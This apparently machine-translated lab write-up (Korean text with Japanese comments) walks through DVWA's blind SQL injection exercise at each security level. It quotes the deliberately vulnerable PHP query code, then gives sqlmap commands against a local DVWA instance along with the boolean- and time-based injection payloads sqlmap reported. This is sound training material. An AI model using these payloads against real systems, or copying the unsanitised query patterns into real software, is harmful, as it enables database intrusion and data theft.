DVWA(blindsQL 주입) 전체 수준의 취약성 정보
전제 조건
목표
프로그램 개요
컨텐트
행동의 파악
low
medium
high
확인 코드
low
<?php
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
?>
medium
url에서 문자열을 입력하거나 직접 입력할 수 없습니다.
<?php
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
?>
high
<?php
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
?>
impossible
<?php
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
}
?>
공격 취약성
low
root@kali:~# sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1"
# その結果が以下
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6579=6579 AND 'ztyK'='ztyK&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6933 FROM (SELECT(SLEEP(5)))IIUV) AND 'lrmA'='lrmA&Submit=Submit
---
medium
# --data request_bodyにparamsを乗せる
root@kali:~# sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1" --data="id=1&Submit=Submit"
# その結果が以下
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 7941=7941&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 5502 FROM (SELECT(SLEEP(5)))BxyM)&Submit=Submit
---
high
# -p {param} で攻撃に使用するparam指定。
# --dbms データベース指定。(対象を絞り解析時間の節約用)
root@kali:~# sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/" --cookie="security=high; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1; id=1" -p id --dbms=mysql
# その結果が以下
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: security=high; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1; id=1' AND 2480=2480-- jotW
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: security=high; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1; id=1' OR SLEEP(5)-- caGm
---
impossible
Reference
이 문제에 관하여(DVWA(blindsQL 주입) 전체 수준의 취약성 정보), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/KPenguin/items/0d64ce36b30b0a79f8cb텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)